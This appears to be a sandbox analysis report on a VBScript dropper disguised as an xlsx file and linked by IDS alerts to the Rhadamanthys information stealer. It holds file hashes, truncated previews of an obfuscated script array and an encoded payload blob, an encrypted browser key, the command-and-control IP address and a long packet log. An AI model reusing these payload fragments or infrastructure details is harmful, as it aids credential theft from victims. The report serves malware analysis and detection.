                                                                                                            Preview:{"dual_user":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAD5MRYvJzSqT7x0qUazdvVMEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADTfxqgd9n8PJe8GwAfHKHdZgXyLkb5j87vz07w/y+v7AAAAAAOgAAAAAIAACAAAADAa44vTND0cWkZqLZXJKyMKZ7xECoL3XV6wbgYeGH1sTAAAABTdBSMmBCXah60tTx/hJNLulT9b8+o7FsdxfakKIl505QQ89KYkrrXcHWXdL3J8qpAAAAA5KsId0qjGyXc6+aeXDVR9+/JGLprO2WYTQhUa22U9FUEYORZYnhIY2BosQffSdV3NhHQKCXJPzUEkS7Qa
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):440292
                                                                                                            Entropy (8bit):5.9509405120024175
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:kxqHKFBb4NeSrNqeMrkZIFVn6xFVJeWO6:kLFfSrNlvmv63VJeWO6
                                                                                                            MD5:1D09A8DF714912C34158386A43692413
                                                                                                            SHA1:132D9EB5E437866FF1F21461C3B592469936392B
                                                                                                            SHA-256:19B60785CB8536773C8709E30F54A824CFEA094E4022C7E255203E498515865D
                                                                                                            SHA-512:380E501F84A3E5904CBA426EAB0EE715105DF2F918D20030BAF74AABEB799E8586FEB343A1F5CCF331843339D413BF314671D275F7D198EE147492D2E64C5F28
                                                                                                            Malicious:false
                                                                                                            Preview:6wJoZnEBm7vY9wkA6wLUjOsCPkUDXCQEcQGbcQGbubkDYorrAlNI6wIKtIHxuPVv5XEBm3EBm4HB/wnykOsColdxAZtxAZtxAZu6MgWBWesCS7frApSMcQGb6wIO4zHKcQGbcQGbiRQLcQGbcQGb0eLrAg9EcQGbg8EE6wLivOsCEFCB+ega/wN8zOsCjMDrAt+yi0QkBOsCtWPrAl15icNxAZvrAsC4gcOi82cA6wILWXEBm7obloPN6wIXAnEBm4HC7NId7usCtANxAZuB6gdpobtxAZvrAtfU6wItyHEBm+sCLRzrAvFhiwwQcQGbcQGbiQwT6wIYkusC7klC6wK4iHEBm4H6wJUEAHXUcQGbcQGbiVwkDOsCnh1xAZuB7QADAABxAZtxAZuLVCQI6wINj3EBm4t8JATrAn5JcQGbievrAhpBcQGbgcOcAAAAcQGb6wKiMFNxAZtxAZtqQOsCiKPrAn+pievrAoEH6wIX48eDAAEAAAAgDARxAZvrAvkvgcMAAQAAcQGb6wIQ5lPrAlAbcQGbietxAZvrAnhIibsEAQAAcQGb6wKL24HDBAEAAOsCZM7rAkMtU3EBm+sCVFpq/+sCD67rAmFrg8IF6wLcxesCFI0x9nEBm3EBmzHJcQGb6wIvZIsa6wI6+3EBm0HrArze6wJi4DkcCnXy6wLaPesCnQVGcQGbcQGbgHwK+7h13OsChrPrAuK9i0QK/OsC2hdxAZsp8OsC3NtxAZv/0nEBm3EBm7rAlQQAcQGb6wKx4DHAcQGb6wIeZ4t8JAxxAZtxAZuBNAdAda/f6wJfgHEBm4PABOsCArRxAZs50HXkcQGbcQGbifvrAlRv6wL4v//XcQGbcQGbqHCv30ATLiSyP/RfvYEG1y8u8CmGziY6wZmbslpxLht0H7XbFfxKZvLnDk7BhLettvMuLjb10LTBhGu/aAmWHYcxot9eIyI7xL4uq011d26XFi6rTXWpBYdzk2zBGaLf
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):55
                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                            Malicious:false
                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                            File type:ASCII text, with very long lines (2760), with CRLF line terminators
                                                                                                            Entropy (8bit):3.623963311003988
                                                                                                            TrID:
                                                                                                              File name:List of Required items xlsx.vbs
                                                                                                              File size:3'049 bytes
                                                                                                              MD5:cf1cdbf6bc49cfd90ecd385d6d92cab7
                                                                                                              SHA1:a956d185c710efca3ec5279041f029457d94a81f
                                                                                                              SHA256:bf104a2d319361c09d65f78c462746e5453445517d147a67b4cb6e1767d92de7
                                                                                                              SHA512:3d2fc87e0e2176446dc6cb3967bf0ddaf9a96d0bcc20445ea656eb1aad62abcec4f37e083c2da31648efb76671fd6a6018e12b20941d47a92303f454cb683b92
                                                                                                              SSDEEP:48:Czt7T1A0e76sgTlf5u7EM7KwMNzghtR02K8UYzgTM9IzgTDf5u7TilMZkzgTLNwU:uJT1A0a6sgTlf5qEahIzgh3x3zgTMez3
                                                                                                              TLSH:BA5169D84F0B998F7B13B7DE5D2420538464243E53AEB9CDEBCAAAF6C40541C4DC0A89
                                                                                                              File Content Preview:s2sk38vmn3zjcvib = Array(1350, 1397, 1384, 1380, 1399, 1384, 1362, 1381, 1389, 1384, 1382, 1399, 1323, 1317, 1370, 1366, 1382, 1397, 1388, 1395, 1399, 1329, 1366, 1387, 1384, 1391, 1391, 1317, 1324, 1329, 1365, 1400, 1393, 1315, 1317, 1395, 1394, 1402, 13
                                                                                                              Icon Hash:68d69b8f86ab9a86
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-05T10:38:03.559598+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.650042TCP
                                                                                                              2024-12-05T10:38:44.942598+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64981452.113.195.132443TCP
                                                                                                              2024-12-05T10:39:15.528705+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649887202.71.109.228443TCP
                                                                                                              2024-12-05T10:39:25.515471+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.1412023192.168.2.649912TCP
                                                                                                              2024-12-05T10:39:47.871094+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64996813.107.246.63443TCP
                                                                                                              2024-12-05T10:39:50.257552+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.1412023192.168.2.649980TCP
                                                                                                              2024-12-05T10:39:50.257552+01002854824ETPRO JA3 HASH Suspected Malware Related Response245.149.241.1412023192.168.2.649980TCP
                                                                                                              2024-12-05T10:40:00.907602+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65001413.107.246.63443TCP
                                                                                                              2024-12-05T10:40:02.337124+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.1412023192.168.2.650018TCP
                                                                                                              2024-12-05T10:40:02.337124+01002854824ETPRO JA3 HASH Suspected Malware Related Response245.149.241.1412023192.168.2.650018TCP
                                                                                                              2024-12-05T10:40:11.994577+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.650041TCP
                                                                                                              2024-12-05T10:40:21.691632+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.650043TCP
                                                                                                              2024-12-05T10:40:28.853100+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.650044TCP
                                                                                                              2024-12-05T10:40:36.015260+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.650046TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 5, 2024 10:38:09.910058022 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:09.910092115 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:09.910197020 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:09.910589933 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:09.910600901 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:11.656213999 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:11.656323910 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:11.660720110 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:11.660729885 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:11.660978079 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:11.671617031 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:11.719335079 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.129929066 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.129950047 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.129966974 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.130021095 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.130036116 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.130057096 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.130095959 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.311467886 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.311492920 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.311573029 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.311584949 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.311608076 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.311629057 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.351896048 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.351916075 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.352042913 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.352042913 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.352052927 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.352269888 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.475965977 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.475991964 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.476106882 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.476106882 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.476121902 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.476682901 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.506866932 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.506895065 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.507165909 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.507174969 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.507558107 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.529119015 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.529144049 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.529386997 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.529403925 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.529768944 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.546375990 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.546401978 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.546509981 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.546519995 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.546600103 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.664875984 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.664908886 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.665041924 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.665041924 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.665051937 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.665441036 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.680268049 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.680295944 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.680488110 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.680488110 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.680495977 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.680636883 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.694441080 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.694461107 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.694991112 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.695003986 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.695220947 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.706789970 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.706805944 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.706932068 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.706932068 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.706939936 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.707036018 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.720976114 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.721003056 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.721201897 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.721210957 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.721365929 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.722790003 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.722857952 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.722964048 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.722971916 CET4434971813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.723006964 CET49718443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.781685114 CET49719443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.781730890 CET4434971913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.781820059 CET49719443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.782947063 CET49719443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.782949924 CET49720443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.782964945 CET4434971913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.783000946 CET4434972013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.783749104 CET49721443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.783812046 CET4434972113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.783848047 CET49720443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.783950090 CET49720443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.783962965 CET4434972013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.784017086 CET49721443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.784302950 CET49722443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.784312010 CET4434972213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.784935951 CET49722443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.785218954 CET49721443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.785234928 CET4434972113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.786197901 CET49723443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.786210060 CET4434972313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.786278963 CET49723443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.786662102 CET49723443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.786663055 CET49722443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:12.786673069 CET4434972213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:12.786674976 CET4434972313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:13.606920004 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:13.606959105 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:13.607039928 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:13.951927900 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:13.951950073 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.512300968 CET4434972313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.512972116 CET4434972013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.513097048 CET49723443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.513135910 CET4434972313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.513645887 CET49723443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.513652086 CET4434972313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.513659000 CET49720443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.513680935 CET4434972013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.514015913 CET49720443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.514023066 CET4434972013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.514425039 CET4434972213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.514560938 CET4434972113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.514662981 CET4434971913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.514767885 CET49722443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.514775038 CET4434972213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.515137911 CET49721443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.515153885 CET4434972113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.515213966 CET49722443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.515219927 CET4434972213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.515429974 CET49719443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.515459061 CET4434971913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.515566111 CET49721443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.515571117 CET4434972113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.515896082 CET49719443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.515902042 CET4434971913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.946322918 CET4434972313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.946387053 CET4434972313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.946479082 CET49723443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.946645021 CET49723443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.946645021 CET49723443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.946677923 CET4434972313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.946687937 CET4434972313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.946893930 CET4434972013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.946950912 CET4434972013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.947067022 CET49720443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.947204113 CET49720443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.947223902 CET4434972013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.947253942 CET49720443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.947261095 CET4434972013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.950275898 CET49730443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.950335026 CET4434973013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.950335979 CET49731443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.950371027 CET4434973113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.950440884 CET49730443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.950508118 CET49731443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.950572014 CET49731443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.950588942 CET4434973113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.950679064 CET49730443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.950695038 CET4434973013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.953888893 CET4434971913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.953922033 CET4434971913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.953978062 CET49719443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.954004049 CET4434972213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954014063 CET4434971913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954026937 CET4434972213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954032898 CET4434972113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954055071 CET4434972113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954055071 CET49719443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.954082012 CET49722443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.954093933 CET4434972213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954106092 CET49721443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.954106092 CET4434972113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954129934 CET49722443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.954159021 CET49721443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.954207897 CET49722443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.954214096 CET4434972213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954231977 CET49722443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.954240084 CET49719443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.954248905 CET4434971913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954266071 CET49719443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.954350948 CET4434972213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954376936 CET4434972213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954437017 CET4434971913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954473972 CET4434971913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.954484940 CET49722443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.954504967 CET49719443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.955476046 CET49721443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.955483913 CET4434972113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.956784964 CET49732443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.956809044 CET4434973213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.956903934 CET49732443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.957228899 CET49732443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.957242966 CET4434973213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.957499027 CET49733443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.957525015 CET4434973313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.957760096 CET49733443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.957896948 CET49733443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.957909107 CET4434973313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.958323956 CET49734443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.958336115 CET4434973413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:14.958415985 CET49734443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.958930016 CET49734443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:14.958944082 CET4434973413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.288553953 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.288656950 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:15.291431904 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:15.291445017 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.291704893 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.305990934 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:15.351334095 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.777420998 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.817994118 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:15.818007946 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.865020037 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:15.897164106 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.897178888 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.897206068 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.897217035 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.897241116 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.897242069 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:15.897296906 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:15.897300005 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:15.943015099 CET49729443192.168.2.668.66.226.116
